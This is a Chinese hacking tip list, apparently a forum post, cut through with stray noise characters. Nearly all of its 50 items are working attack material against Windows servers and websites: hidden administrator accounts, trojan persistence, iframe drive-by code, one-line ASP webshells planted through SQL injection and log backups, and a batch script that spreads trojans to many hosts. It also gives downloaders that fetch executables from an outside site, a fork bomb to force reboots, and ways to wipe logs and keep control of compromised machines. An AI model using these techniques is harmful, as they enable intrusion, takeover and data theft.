Xp系统修改权限防止病毒或木马等破坏系统,cmd下,: ^2 k1 y( {8 H2 A( m/ F
cacls C:\windows\system32 /G hqw20:R& v; F) S' Q; A, X+ @
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入& G, c- q+ E& u9 x( x
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F4 }8 [# ^# U7 U& a! S; X+ [
. `& e# n) i9 j p) j
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
0 ^ q; b3 C9 G8 Q/ T0 a( P- N' r+ z/ V8 \
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。; n' P; T: v; ]$ ^4 u# S6 w
. T: g3 x- g5 i1 d1 h
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 I3 B+ K0 s/ }* P% k' j$ Y6 L% J/ k" V, Q
5、利用INF文件来修改注册表7 c7 d) I% Y/ N. {, K: C
[Version]2 ~7 F4 ~! S# J2 U4 N, j0 ~
Signature="$CHICAGO$"5 H! ]5 t7 |. G# k; @; D
[Defaultinstall]
' u; b' \& n7 m8 maddREG=Ating8 i/ d W9 |3 ?$ h; ?
[Ating]
7 F/ v- _7 E% `HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"" [6 ^' J/ U' F
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:, Y+ C9 y: [9 X1 Z' ^& a2 U
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径, n' O" h' n: x9 X* q
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU0 A8 {5 {& o, R: O
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
. U; c, |$ k& k; m2 }. A6 R: C( OHKEY_CURRENT_CONFIG 简写为 HKCC* j: e7 E: C# V2 r! T% l7 w1 f
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值3 u( J1 R0 C( J1 N2 m) m
"1"这里代表是写入或删除注册表键值中的具体数据$ H2 `" E& C+ z3 U. N7 f7 S
8 G( Z8 n5 W+ d& }6 W3 Y5 {6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画, D) ~$ r7 a- ^' S ]' h5 i
多了一步就是在防火墙里添加个端口,然后导出其键值/ t# v6 ^0 G( Q/ ?0 P
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
% V( J7 O4 Y4 r, V0 Q; K: P
6 {7 a" p S5 _/ T7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
& X. |! n$ m, a$ Z; }在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。1 Z, s, p5 E$ P4 Q
' x8 L* V% `0 c3 F- _9 q9 X x L
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
6 Y& k/ S O8 c9 Q& T7 d! `! D
; Y" n0 k' ?- }& h) p! y9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
: b+ m0 P" L. b' i, r1 _: M2 ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。3 h" }* z: h6 T0 t
+ A8 b6 X0 [9 R+ T6 X$ h" K
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
( _5 [8 Q* W6 q" R) q0 v f% `- B: O, |/ ]5 H) N
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
# ?# F" O" n3 ^! C用法:xsniff –pass –hide –log pass.txt
6 ~9 Q% g6 b/ s. d8 M( m4 P; b q2 E, a+ Z' f w1 a3 p+ L
12、google搜索的艺术8 e3 A3 _7 v& T4 _$ n. v
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ ^9 f0 B; ], L) Z或“字符串的语法错误”可以找到很多sql注入漏洞。
& H' z4 Z$ E! f4 x0 W
+ x P9 i5 y3 f- B" p' z+ O# c13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; w# N2 x [7 X. K
7 _# I, _: ] x# S% U14、cmd中输入 nc –vv –l –p 1987
+ A! G! ^, d/ j h- ]做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
' T1 q) z+ \. S O4 z" p; i
2 i3 X0 g# z/ g; f, J15、制作T++木马,先写个ating.hta文件,内容为1 [: V- y2 L4 {. {1 G* w
<script language="VBScript">6 { C% ~5 P1 i/ b
set wshshell=createobject ("wscript.shell" ), \7 M; B+ }$ o( d2 R9 `
a=wshshell.run("你马的名称",1)! W( U7 Q3 I5 H+ \2 S N! p
window.close
& R3 O* ]' l9 J& p: x; M$ U</script>9 ^" t9 x9 W$ z. v, h8 P: ]( j
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
# }7 ^$ M1 E2 M5 U9 o! {& X& K& v. F. g1 S8 ]
16、搜索栏里输入
" K4 u5 j4 T5 a/ P+ e9 n, w/ F关键字%'and 1=1 and '%'='
- Q* p. c) j% T. G; ~关键字%'and 1=2 and '%'='
) o. d; d3 G1 t- W! `* M0 H比较不同处 可以作为注入的特征字符/ Y8 j+ ?5 D% J h; `. _ p7 x
% u+ c/ u2 b9 |9 p4 q( Y) w/ p17、挂马代码<html>$ u+ I- }9 D) f. S* Y1 ^8 p
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
0 f' F7 j1 X8 `- l$ g# K+ p7 u; ]8 Q</html>
+ R: p- y: o3 W
4 I( Q$ \! F6 R6 [8 n. Q18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,) B4 _+ }6 P+ v: b; U. M1 r
net localgroup administrators还是可以看出Guest是管理员来。
- \- X+ u/ X! _; [
2 E9 i' U7 A- J o19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等7 x/ P9 I0 I# [, Z, E( a
用法: 安装: instsrv.exe 服务名称 路径7 r, q4 M1 `5 K7 | L+ R3 B' l
卸载: instsrv.exe 服务名称 REMOVE9 J# @* N" V! I F
- B( R+ n2 w% T
/ S# g; s) `9 s$ q3 X' q
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
8 l' c) F6 n( G8 j- T+ l. f不能注入时要第一时间想到%5c暴库。2 p3 C. u- Y/ Z, _
( N* p l, o( {# _8 R) O22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
4 C/ g+ _3 a1 E( L1 r3 ^& H0 C' y% }- m7 E; z) ^/ h2 m1 d6 J
23、缺少xp_cmdshell时* N- u& \2 u1 U5 n0 I
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! x3 B$ e1 ^' O) U( _
假如恢复不成功,可以尝试直接加用户(针对开3389的)( w7 K' S4 c |& P& J5 ?
declare @o int5 X, I9 h, N/ a
exec sp_oacreate 'wscript.shell',@o out0 Z3 V) k6 l: K) v9 `" g. _. T8 u
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员% U) g' D9 M9 \5 [1 D
0 P' s+ j. {8 J7 z; ]" l; H
24.批量种植木马.bat
2 m3 [# O; x: w5 |0 P8 J5 }4 T- j; q" jfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中0 H3 T0 a* ^+ f8 U. W' m+ b" [
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
$ ]% h: S, R0 B4 h6 [9 \; d$ ^扫描地址.txt里每个主机名一行 用\\开头! Z! c0 W. G, W& B& Z
) h; F4 g1 X1 [; s5 u& D25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
& R, W% j2 O1 P7 C
z- v" y3 M7 q1 g6 P: I26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.5 s7 x6 p) v( E, R/ j1 q) d
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% P& C( x5 ?5 n9 b& t O" B7 G$ c: V
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马6 Z4 M% [0 ^% d( k/ M S* X8 g
6 u- a* q1 ?! }) c/ S8 s& \ L) Q) g
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP3 ^/ g- x {) P1 j; s6 R
然后用#clear logg和#clear line vty *删除日志 c* a) J6 k2 t. a5 J- e0 B J" c
: ?2 N& d$ {" R5 F; y9 U2 L
28、电脑坏了省去重新安装系统的方法6 A% u; l; ~5 m3 \: I8 M& {
纯dos下执行," R3 a% }( O# X. v! O0 y) C
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
! x n: M! P' S: v2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
! E0 `8 Q( d$ D- E3 ^
( m5 b4 J2 h, G2 I8 `/ Q29、解决TCP/IP筛选 在注册表里有三处,分别是:' O4 K' x/ N$ x
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
6 o" W9 I, A4 P n1 G L BHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, c& z) ^* }% n4 B1 [2 q+ A2 ?; K% V; I
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 ^, u* n) R9 Y4 o# M# S9 q/ P分别用$ U- }3 K- e7 M: h# k
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 L9 P9 H& \1 n# {regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 e9 y+ i5 t$ _+ R) R# |
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 j' s1 h# l, s6 d; \) a9 o/ H命令来导出注册表项
) M/ f* J* Y/ Q2 |* b然后把三个文件里的EnableSecurityFilters"=dword:00000001,8 }/ f) m+ I5 I( ^& H7 f& m; U3 F
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
& V0 j) X. s; j. Iregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
) H8 [* |+ J4 U9 V3 k% `; o- |/ m+ d, w- ` o8 B
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U9 T4 S( ~; E8 _$ U K; I" m3 O
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
; I- ^. d! e+ P0 S0 Y6 ~: O3 b
3 z5 y6 r$ ` B- v8 B5 D- C) K" m2 r31、全手工打造开3389工具
6 Y. y* G8 x" S6 x0 H打开记事本,编辑内容如下:8 Q/ C' d+ F& G+ G
echo [Components] > c:\sql
# s6 t8 T9 O. l# v: X/ E3 ^9 _echo TSEnable = on >> c:\sql7 ?. I/ b- P) X2 }7 O
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( u1 V7 ?6 Z6 Y2 ^9 ~* b, c& [0 { \% [编辑好后存为BAT文件,上传至肉鸡,执行: y, s* D6 M. w' {
. u1 |& q3 W4 p, w5 X" g
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马4 @5 m( U0 f0 z+ m% i% r. N
2 H8 B4 m' b: Y( ~# [3 g1 y5 l
33、让服务器重启
4 A" O; I% T" g写个bat死循环:0 a6 b2 U, O4 V- m4 u6 J5 Q
@echo off
3 T/ q: j1 N" o1 h:loop1
+ P( I2 h6 l6 O2 fcls
) Q- |; r; H; l# {; r9 X" {start cmd.exe
" i) F1 e# }; D; x" ~& Kgoto loop1: E" d: G) q6 I$ l3 e+ g+ Q
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启( n- L4 c4 W5 J6 j; r' f9 b
% N+ e. w0 D0 i2 a! V- G' L
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
5 m2 E( r1 g0 F% r6 @@echo off
* I7 ?; g7 X2 U* {0 p" [* J+ Edate /t >c:/3389.txt
' f! s4 L6 J% ?: R0 m8 Stime /t >>c:/3389.txt( x3 W) {4 w! ~" Z, j
attrib +s +h c:/3389.bat
- o# p6 m+ D Battrib +s +h c:/3389.txt
4 a4 B2 H( w9 L/ Xnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt( o7 M% g1 c( [) ^2 ]
并保存为3389.bat! p2 [; i( V0 F$ w8 l
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
% f/ B, [; _( W: p C% R( w7 E& F8 Z r" ^
35、有时候提不了权限的话,试试这个命令,在命令行里输入:+ B- }: H+ { _# L- P: w1 D+ S
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页) x' h" }4 }$ p; O) s
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- l! u7 G6 I6 ^" |( f
/ a6 O' P9 n& q. A& w) b' I: W. h
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
& o' M! w0 Q& ?echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
" s% d) E+ j# G# R( g. _echo 你的FTP账号 >>c:\1.bat //输入账号
% u+ T8 t6 w3 ~2 [- f6 m* i- Secho 你的FTP密码 >>c:\1.bat //输入密码
7 O$ p% j O& Xecho bin >>c:\1.bat //登入
' D4 C9 x( v* Q# i6 techo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么) A4 l C8 e* H$ R( }6 X2 y
echo bye >>c:\1.bat //退出
: |6 R5 c& t4 y/ X9 H) |然后执行ftp -s:c:\1.bat即可
. b7 @6 w0 j) u0 [2 M
3 A2 |' B! Z7 ~. C, W37、修改注册表开3389两法
5 ~4 Q- O Q* h$ D(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
; _/ z0 T4 t* ^8 Hecho Windows Registry Editor Version 5.00 >>3389.reg& \7 [, ^, c; f! R+ B% V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) p# T* q! K1 \+ x
echo "Enabled"="0" >>3389.reg
( j# `1 w3 r1 u) v* Z) becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
" J' k$ `9 w2 c$ j# t0 o4 J2 uNT\CurrentVersion\Winlogon] >>3389.reg
; A9 O0 |8 w' J% _0 J' x% Oecho "ShutdownWithoutLogon"="0" >>3389.reg
3 t* h4 q8 M W' _; Y5 j# oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] B# B8 y8 k: b0 B2 R" r+ _
>>3389.reg3 O) k V6 U; r0 [( ^
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 _4 {; j: V7 ?( C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
# k- b- J. L, ^>>3389.reg
; x7 c% ?$ S! Decho "TSEnabled"=dword:00000001 >>3389.reg
2 B+ @" h9 _& \. A2 kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg1 \- @' x+ h" n% E9 Y0 j( M
echo "Start"=dword:00000002 >>3389.reg& J0 y& y @% T9 M4 s& G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]: Q$ S8 |6 x- [ `2 r6 z
>>3389.reg
) |3 ~4 C+ o+ i4 `' H+ S3 ]& M5 Qecho "Start"=dword:00000002 >>3389.reg
) J" e3 P. s8 O& F2 j4 j+ E/ s9 techo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
) u" W. j' \. `$ F, Cecho "Hotkey"="1" >>3389.reg
2 o4 V. }8 I; m" \* \1 F8 I5 l; Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 ^. p4 m# a) c( a( \8 a
Server\Wds\rdpwd\Tds\tcp] >>3389.reg* A; H) r2 X6 f9 b; y( P: _
echo "PortNumber"=dword:00000D3D >>3389.reg
% u: ?% ]2 @9 }* Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 g; G3 E0 v/ O/ M4 B
Server\WinStations\RDP-Tcp] >>3389.reg6 r; t& }( r* P5 q# G$ @5 M; r% {7 C
echo "PortNumber"=dword:00000D3D >>3389.reg
. V5 A8 F# {' |把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。' s: M4 C6 @5 f' I6 \' u
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)" K) l! @# `1 W& |# S
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
' Y# m2 y6 \+ e: [' K(2)winxp和win2003终端开启
# o: t# F- ?5 l1 J用以下ECHO代码写一个REG文件:
8 ]: P' v2 g4 G: d aecho Windows Registry Editor Version 5.00>>3389.reg
6 B* k6 F. e, R( j/ x) v$ e. S' [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 m8 ]$ U* A! L: H9 M1 s4 u8 y* \
Server]>>3389.reg5 ^& Y' A5 b1 D6 a0 a5 X
echo "fDenyTSConnections"=dword:00000000>>3389.reg7 J$ Z* `/ m2 R4 N; ?0 ^ N- p# U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 [. S, S1 q1 @
Server\Wds\rdpwd\Tds\tcp]>>3389.reg7 c2 U$ q8 h# o. w/ H0 s! O
echo "PortNumber"=dword:00000d3d>>3389.reg" Y+ {& s$ y& @+ Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 f! L( }- x5 Q4 t# U E7 C
Server\WinStations\RDP-Tcp]>>3389.reg8 y( }0 ?: K# K; W6 o2 O' O
echo "PortNumber"=dword:00000d3d>>3389.reg% e1 P0 u7 y) _2 z* i
然后regedit /s 3389.reg del 3389.reg
* y. k/ H5 a6 l0 I% dXP下不论开终端还是改终端端口都不需重启
y! \6 x9 \. V( n; v) d6 ?- e; r3 M$ J" M* ^. K
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃3 U k5 N$ k0 c: A7 O$ i! v
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'* h$ v: S2 _. J, e" {/ i
- I! v3 n* t1 N7 B. v4 i
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!5 {0 }6 l3 O6 J9 @' |7 O
(1)数据库文件名应复杂并要有特殊字符
" v2 K7 b* W( A! X1 a' H(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: T# I; \4 `8 z# s {将conn.asp文档中的
; Y; M) c$ Q9 z! X# J7 p7 z; ]DBPath = Server.MapPath("数据库.mdb")8 r, d1 J: y$ H# ~4 j" R
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath0 I, Y) w9 K$ r. V/ t8 P' W7 ^0 t
; a% B" V7 E% R# \8 z( A0 A' v
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置" N5 n+ T4 W- l: H: z8 Y
(3)不放在WEB目录里
- s b- h0 `' ^+ ~9 G7 g) F! X* C. n! r g6 \/ {# {6 {
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 O( N9 {" K" }* X/ s+ X可以写两个bat文件. P: q) N2 |4 }/ y" K
@echo off1 _+ y9 _- b2 \4 h/ z' U
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
8 |8 i. F, x% ~3 j" ?. _. h% k@del c:\winnt\system32\query.exe
; z9 e( S' q U1 m@del %SYSTEMROOT%\system32\dllcache\query.exe
4 O9 w' y- _& C6 {) M@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的3 |, T) k; _; B) z& Y- S: |
2 f' t& k7 I6 Z" `3 e' h2 L" P7 s@echo off
- E% J' H8 Q2 e- u* E2 v# { G# T@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe* ]4 w/ G3 ~: d9 l4 n
@del c:\winnt\system32\tsadmin.exe6 x1 k$ }. }* Y) _+ f
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 d" O1 f2 Z! }1 ]$ Y
% w5 `! O% b8 b# o41、映射对方盘符
. u2 { U1 O9 X+ jtelnet到他的机器上,
( l( J+ V9 l8 c0 k+ h7 l: Z1 Mnet share 查看有没有默认共享 如果没有,那么就接着运行& J' Q* h& r& T! D% A7 a2 }4 w
net share c$=c:
' C7 g- ]8 M0 K2 T5 t( Snet share现在有c$
) t2 ]1 w& t! j在自己的机器上运行
* r9 E# u$ \8 Znet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
# s* L: t1 w( U' t4 L
' w7 P% S* T& a; x9 @2 ?42、一些很有用的老知识4 L( {/ u( r6 }! H( c
type c:\boot.ini ( 查看系统版本 )4 o; ^ q: O/ i# }' c5 w
net start (查看已经启动的服务)
; a- _+ [+ p- @+ O9 | [query user ( 查看当前终端连接 )6 y9 D- s5 u5 v5 h/ T" e) I
net user ( 查看当前用户 )* q8 W# H2 `- j3 `/ _
net user 用户 密码/add ( 建立账号 )
. o8 L7 A5 ]; ^3 ?1 Lnet localgroup administrators 用户 /add (提升某用户为管理员)/ A* [" g* K8 q- w7 u1 `
ipconfig -all ( 查看IP什么的 )
% _* E Q: ]4 e4 c0 D: y E! Snetstat -an ( 查看当前网络状态 )8 r6 D- s/ F+ `8 ^5 ^
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)8 z5 ^/ X& r7 W7 }* v
克隆时Administrator对应1F4; c# }# G+ C: `1 d* q1 z- a
guest对应1F53 j6 M( G2 R5 R3 I a
tsinternetuser对应3E8+ x" u; V, h$ H o
, T6 N S: X! j* \ x
43、如果对方没开3389,但是装了Remote Administrator Service
% B7 w( A6 ~/ Z, Q0 K6 J用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接 y5 W, ^9 }7 g) m5 y2 s4 e
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
. Q$ u# \2 q( c; u) g先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin", [2 }' j" s# @3 a# s& e* F
* X) l" L5 h9 `- D44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 a) C" s) J" q" J6 ]. q- n1 ?本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
# E/ n8 P5 P9 y/ K" O" J, X" u% u6 \( J \' P1 S& ^. [
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- N: Y/ Q; R" \# [echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
% ^6 E: d! M7 |$ V, z^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =% ^" u( C, p4 h( b
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 A& J4 ^2 x0 U1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
, X0 S7 q( O6 C(这是完整的一句话,其中没有换行符)
4 [6 c, E+ l1 d9 t4 D B, Q# i$ n( A然后下载:
* g4 \* s( R9 H, I b, Jcscript down.vbs http://www.hack520.org/hack.exe hack.exe
8 k3 H% L5 U4 l/ G: \
0 r& u* ^" {2 @, W- x7 H8 D46、一句话木马成功依赖于两个条件:
# l8 L* P3 e6 [, t3 Y) W' l" y6 T1、服务端没有禁止adodb.Stream或FSO组件
5 o, X) O* t* [+ p. b/ Z2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
6 j! v' t+ a1 ?4 d6 x. }$ T
+ K2 C1 R" d# d0 B6 F47、利用DB_OWNER权限进行手工备份一句话木马的代码:
/ A! O% {) p- ~;alter database utsz set RECOVERY FULL--" y7 c0 W+ l$ T$ n* w B r; w2 K
;create table cmd (a image)--, s4 E: P$ {! |5 \ t# [; U6 q6 @
;backup log utsz to disk = 'D:\cmd' with init-- U7 h" ]( T" E; x
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
0 A0 X5 ^0 z3 O# h;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
$ v: X# L: b+ n& ^) X) q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( u& `% d( L% y$ R6 `
3 L4 N% y- t) l B48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
' U4 ?1 V2 A) |# }0 p3 [& W3 M
- a- L7 E$ t% l8 o用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options# j' x5 g* m' t% R$ h
所有会话用 'all'。
`$ I7 H6 J+ P5 u-s sessionid 列出会话的信息。
7 C* T$ v2 z' V* ^/ U6 g% A* n-k sessionid 终止会话。- I, M2 }$ L0 {2 H2 Z" T |. s
-m sessionid 发送消息到会话。
+ F, v% i' B! O8 _6 ^
* j4 h1 w$ ^& h1 W0 A. Wconfig 配置 telnet 服务器参数。% }4 ~- Z6 U# r: x2 R7 U- [" V: M
, V1 Y2 T3 z) g9 d( \; }
common_options 为:9 Y" i3 K- N! [+ G8 V/ L
-u user 指定要使用其凭据的用户% T4 K8 c3 |' }1 t" X# n- o
-p password 用户密码* z( u t. j+ M' f7 X. e* H; Z
/ r- i7 r# X9 O
config_options 为:: ] i+ ]9 `' J
dom = domain 设定用户的默认域* W& }# w4 R `! a5 X, h ?# w2 L
ctrlakeymap = yes|no 设定 ALT 键的映射
0 }, G) i+ M. g+ f; e; ftimeout = hh:mm:ss 设定空闲会话超时值
- i3 }/ X' M) n# N" y5 h3 c9 c% btimeoutactive = yes|no 启用空闲会话。
4 D* {! u" Z' E5 omaxfail = attempts 设定断开前失败的登录企图数。
6 P4 l: W) |5 m- zmaxconn = connections 设定最大连接数。
R4 b7 D4 C8 p( Fport = number 设定 telnet 端口。
" s4 ? P( D% J' Vsec = [+/-]NTLM [+/-]passwd3 a5 X& `2 l; C& Y0 G, x' O! a. Y
设定身份验证机构
& l! [. w! Y' ifname = file 指定审计文件名。
6 l! i& Q* _8 Ufsize = size 指定审计文件的最大尺寸(MB)。+ n4 F& A$ K% o7 `
mode = console|stream 指定操作模式。
: J$ k$ a" P* [, V' r7 sauditlocation = eventlog|file|both/ K- f% I0 a3 g% m' [/ C& n
指定记录地点7 e6 E+ C: p5 I/ V$ R- H. l, S
audit = [+/-]user [+/-]fail [+/-]admin0 u o7 S" }2 o! h5 k
5 g L. h+ g# J49、例如:在IE上访问:
3 D% N$ o: g) R0 ~www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. t& Q$ u! K4 x F& v: I
hack.txt里面的代码是:. V& K. e+ ^8 Y, _6 s0 m* D* ~
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">) E+ C, F, D: |% v/ M
把这个hack.txt发到你空间就可以了!
/ M; ?- z% l9 y& G; |2 e这个可以利用来做网马哦!* r& c% k0 w; M+ }
( H$ w2 ^# I6 }: H) l* K, |50、autorun的病毒可以通过手动限制!, {8 X4 b% Q( O1 [
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 {7 u- W& H- k2,打开盘符用右键打开!切忌双击盘符~# }' _8 a+ Y5 L2 t5 J, {% E
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
# D$ }8 H1 Q+ g4 }5 ]
. K( y. V1 b q( x& X+ X: x51、log备份时的一句话木马:/ S- ^* D1 C4 p$ W$ S9 `
a).<%%25Execute(request("go"))%%25>
' f# T4 A4 U3 v! q3 vb).<%Execute(request("go"))%>
. L. r% x0 X! f: _% c. {8 U* J9 _c).%><%execute request("go")%><%* q1 a# q6 J2 B( T. b
d).<script language=VBScript runat=server>execute request("sb")</Script>+ d! h1 a; t1 X1 l: g
e).<%25Execute(request("l"))%25>
7 O% m; ^+ Q3 d& N7 e& X" zf).<%if request("cmd")<>"" then execute request("pass")%>
